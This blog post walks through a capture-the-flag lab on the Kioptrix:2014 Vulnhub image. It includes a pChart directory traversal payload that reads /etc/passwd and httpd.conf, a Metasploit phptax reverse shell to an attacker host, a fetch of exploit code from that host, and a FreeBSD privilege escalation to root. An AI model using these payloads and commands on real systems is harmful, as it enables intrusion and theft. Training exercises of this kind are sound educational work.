Kioptrix:2014 – CTF

This is a walk through of how I gained root access to the Kioptrix:2014 image from Vulnhub.com.  This walk through is being provided for educational purposes only.  All testing on this image was performed in an isolated lab environment.  Understand that using the tools in this walk through against a host without permission is against the law.  Be smart folks.  Enjoy the walk through.

Full NMAP Scan:

root@kali:~# nmap -p- -A 192.168.1.231
Starting Nmap 7.25BETA2 ( https://nmap.org ) at 2017-06-29 18:39 CDT
Nmap scan report for 192.168.1.231
Host is up (0.0024s latency).
Not shown: 65532 filtered ports
PORT STATE SERVICE VERSION
22/tcp closed ssh
80/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
8080/tcp open http Apache httpd 2.2.21 ((FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8)
|_http-title: 403 Forbidden
MAC Address: 08:00:27:5F:87:38 (Oracle VirtualBox virtual NIC)
Aggressive OS guesses: Vonage V-Portal VoIP adapter (91%), Cisco Unified Communications Manager VoIP adapter (91%), DD-WRT v23 (Linux 2.4.36) (91%), Vyatta router (Linux 2.6.26) (91%), Linux 2.6.18 (91%), Linux 2.6.26 (PCLinuxOS) (91%), Netgear ReadyNAS Duo NAS device (RAIDiator 4.1.4) (91%), Sun OpenSolaris 2009.06 (91%), Zhone 6211-I3 series ADSL2+ modem (91%), Linux 2.6.18 – 2.6.22 (90%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop

Port 80 enumeration using Curl.  Curl reveals the URL to an application called pChart ver 2.1.3. (Modified output slightly to display properly)

root@kali:~# curl -i http://192.168.1.231
HTTP/1.1 200 OK
Date: Thu, 29 Jun 2017 14:34:17 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Last-Modified: Sat, 29 Mar 2014 17:22:52 GMT
ETag: “105c6-98-4f5c211723300″
Accept-Ranges: bytes
Content-Length: 152
Content-Type: text/html
HTTP-EQUIV=”refresh” CONTENT=”5;URL=pChart2.1.3/index.php”>

Local search of Exploit DB identified directory traversal and XSS vulnerabilities for the pChart application.  Link to exploit: https://www.exploit-db.com/exploits/31173/

root@kali:~# searchsploit pchart
————————————————————————————————————— ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
————————————————————————————————————— ———————————-
pChart 2.1.3 – Multiple Vulnerabilities | ./php/webapps/31173.txt
————————————————————————————————————— ———————————-
root@kali:~# cat /usr/share/exploitdb/platforms/php/webapps/31173.txt
# Exploit Title: pChart 2.1.3 Directory Traversal and Reflected XSS
# Date: 2014-01-24
# Exploit Author: Balazs Makany
# Vendor Homepage: http://www.pchart.net
# Software Link: http://www.pchart.net/download
# Google Dork: intitle:”pChart 2.x – examples” intext:”2.1.3″
# Version: 2.1.3
# Tested on: N/A (Web Application. Tested on FreeBSD and Apache)
# CVE : N/A
[0] Summary:
PHP library pChart 2.1.3 (and possibly previous versions) by default
contains an examples folder, where the application is vulnerable to
Directory Traversal and Cross-Site Scripting (XSS).
It is plausible that custom built production code contains similar
problems if the usage of the library was copied from the examples.
The exploit author engaged the vendor before publicly disclosing the
vulnerability and consequently the vendor released an official fix
before the vulnerability was published.
———————–
[1] Directory Traversal:
“hxxp://localhost/examples/index.php?Action=View&Script=%2f..%2f..%2fetc/passwd”
The traversal is executed with the web server’s privilege and leads to
sensitive file disclosure (passwd, siteconf.inc.php or similar),
access to source codes, hardcoded passwords or other high impact
consequences, depending on the web server’s configuration.
This problem may exists in the production code if the example code was
copied into the production environment.

Utilized directory traversal vulnerability to view httpd.conf file.  Found something interesting. (Using browser produces cleaner output, using Curl output in example below):

root@kali:~# curl http://192.168.1.231/pChart2.1.3/examples/index.php?Action=View&Script=../../../../../../../usr/local/etc/apache22/httpd.conf
SetEnvIf User-Agent ^Mozilla/4.0 Mozilla4_browser
——————–
VirtualHost *:8080>
DocumentRoot /usr/local/www/apache22/data2

Enumerating port 8080 using Curl and the Mozilla 4.0 UA reveals the phptax application:

root@kali:~# curl -i -H “User-Agent:Mozilla/4.0” http://192.168.1.231:8080
HTTP/1.1 200 OK
Date: Thu, 29 Jun 2017 20:11:45 GMT
Server: Apache/2.2.21 (FreeBSD) mod_ssl/2.2.21 OpenSSL/0.9.8q DAV/2 PHP/5.3.8
Content-Length: 201
Content-Type: text/html;charset=ISO-8859-1
—————————————————-
a href=phptax/”> phptax

Local search of Exploit DB reveals remote code execution vulnerabilities for the phptax application:

root@kali:~# searchsploit phptax
—————————————————————————————————————————————- ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
—————————————————————————————————————————————- ———————————-
PhpTax – pfilez Parameter Exec Remote Code Injection | ./php/webapps/21833.rb
phptax 0.8 – Remote Code Execution | ./php/webapps/21665.txt
PhpTax 0.8 – File Manipulation (newvalue) / Remote Code Execution | ./php/webapps/25849.txt

Used the following MSF module to take advantage of the vulnerability:  https://www.rapid7.com/db/modules/exploit/multi/http/phptax_exec

MSF Options:

msf exploit(phptax_exec) > options
—————————————–
Module options (exploit/multi/http/phptax_exec):
—————————————–
Name Current Setting Required Description
—- ————— ——– ———–
Proxies no A proxy chain of format type:host:port[,type:host:port][…]
RHOST 192.168.1.231 yes The target address
RPORT 8080 yes The target port
SSL false no Negotiate SSL/TLS for outgoing connections
TARGETURI /phptax/ yes The path to the web application
VHOST no HTTP server virtual host
————
Exploit target:
Id Name
— —-
0 PhpTax 0.8

Running exploit and gaining low privilege shell:

msf exploit(phptax_exec) > run
————
[*] Started reverse TCP double handler on 192.168.1.234:443
[*] 192.168.1.2318080 – Sending request…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Accepted the first client connection…
[*] Accepted the second client connection…
[*] Command: echo r4zXySRDP8YiPQT7;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Command: echo lXbqAkCsNmmIvPWp;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets…
[*] Reading from socket B
[*] B: “r4zXySRDP8YiPQT7\r\n”
[*] Matching…
[*] A is input…
[*] Reading from socket B
[*] B: “lXbqAkCsNmmIvPWp\r\n”
[*] Matching…
[*] A is input…
[*] Command shell session 1 opened (192.168.1.234:443 -> 192.168.1.231:38670) at 2017-06-29 16:35:12 -0500
[*] Command shell session 2 opened (192.168.1.234:443 -> 192.168.1.231:23736) at 2017-06-29 16:35:12 -0500
————
id
uid=80(www) gid=80(www) groups=80(www)

Thorough OS enumeration shows us that this host is running FreeBSD version 9.  Searching for local privilege escalation vulnerabilities using local Exploit DB:

root@kali:~# searchsploit freebsd 9. priv local
————————————————————————————————————- ———————————-
Exploit Title | Path
| (/usr/share/exploitdb/platforms)
————————————————————————————————————- ———————————-
Firebird 1.0.2 FreeBSD 4.7-RELEASE – Privilege Escalation | ./bsd/local/29.c
FreeBSD 9.0 < 9.1 mmap/ptrace – Privilege Escalation | ./freebsd/local/26368.c
FreeBSD 9.0 – Intel SYSRET Kernel Privilege Escalation | ./freebsd/local/28718.c

Transferring exploit code using fetch:

pwd
/tmp
fetch -o /tmp/26368.c http://192.168.1.234/26368.c
/tmp/26368.c 2215 B 14 MBps

Compile and run exploit code:

gcc -o 26368 26368.c
chmod 755 26368
./26368
id
uid=0(root) gid=0(wheel) egid=80(www) groups=80(www)

Congrats.txt file:

pwd
/root
cat congrats.txt
If you are reading this, it means you got root (or cheated).
Congratulations either way…

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s